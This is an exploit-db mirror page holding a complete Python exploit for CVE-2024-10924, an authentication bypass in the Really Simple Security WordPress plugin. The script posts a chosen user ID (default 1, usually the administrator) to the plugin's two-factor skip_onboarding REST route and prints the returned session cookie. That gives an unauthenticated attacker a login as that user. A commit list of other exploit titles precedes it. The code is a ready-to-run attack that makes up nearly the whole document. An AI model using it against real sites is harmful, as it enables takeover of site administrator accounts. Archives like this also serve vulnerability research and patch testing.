bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52207.py
Exploit-DB b905517ca9 DB: 2025-04-16 
22 changes to exploits/shellcodes/ghdb

Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure

ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection

Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS
ABB Cylon Aspect 3.08.03 - Hard-coded Secrets

Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
IBMi Navigator 7.5 -  HTTP Security Token Bypass
IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)

Plane 0.23.1 - Server side request forgery (SSRF)
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)
ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning

Cacti 1.2.26 -  Remote Code Execution (RCE) (Authenticated)

OpenCMS 17.0 - Stored Cross Site Scripting (XSS)

Really Simple Security 9.1.1.1 - Authentication Bypass

Pymatgen 2024.1 - Remote Code Execution (RCE)
2025-04-16 00:16:24 +00:00

124 lines
No EOL
4.9 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python3
# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass
# Date: 2024-11-19
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://really-simple-ssl.com/
# Software Link: https://really-simple-ssl.com/
# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1
# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution)
# CVE: CVE-2024-10924
# Category: WebApps
# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
# Vulnerability discovered and reported by: István Márton
# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability.
# This makes it possible for unauthenticated attackers to log in as any existing user on the site,
# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
import argparse
import json
import logging
import random
import requests
import string
import validators
from requests.auth import HTTPBasicAuth
VERSION = "v1.0 (2024-11-19)"
DEFAULT_LOGGING_LEVEL = logging.INFO
def parse_arguments():
parser = argparse.ArgumentParser(
description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}"
)
parser.add_argument("-t", "--target",
required=True,
help="URL of the target WordPress")
parser.add_argument("-uid", "--user-id",
required=False,
default=1,
help="Victim user ID (1 is usually the admin).")
parser.add_argument("-v", "--verbose",
action="store_true",
required=False,
default=False,
help="verbose mode")
return parser.parse_args()
def validate_input(args):
try:
validators.url(args.target)
except validators.ValidationFailure:
raise ValueError("Invalid target URL!")
try:
if int(args.user_id) < 1:
raise ValueError("Invalid user ID!")
except ValueError:
raise ValueError("Invalid user ID!")
def send_request(url, user_id):
logging.info("Sending request to target WordPress.")
target_endpoint = f"{url}"
if not target_endpoint.endswith("/"):
target_endpoint = f"{target_endpoint}/"
target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
}
body = {
"user_id": int(user_id),
"login_nonce": "".join(random.choices(string.digits, k=10)),
"redirect_to": "/wp-admin/"
}
logging.debug(f"Body: {body}")
try:
r = requests.post(target_endpoint, headers=headers, json=body , verify=False)
logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).")
except Exception as e:
logging.fatal("Error in contacting the target WordPress.")
logging.fatal(e)
return
if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]:
logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------")
else:
logging.fatal("Wrong response received from the target WordPress.")
logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------")
def main():
args = parse_arguments()
logging_level = DEFAULT_LOGGING_LEVEL
if args.verbose:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
validate_input(args)
target = args.target.strip()
user_id = int(args.user_id)
logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}")
logging.debug("Parameters:")
logging.debug(f" target = {target}")
logging.debug(f" user_id = {user_id}")
send_request(target, user_id)
logging.info("Finished.")
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink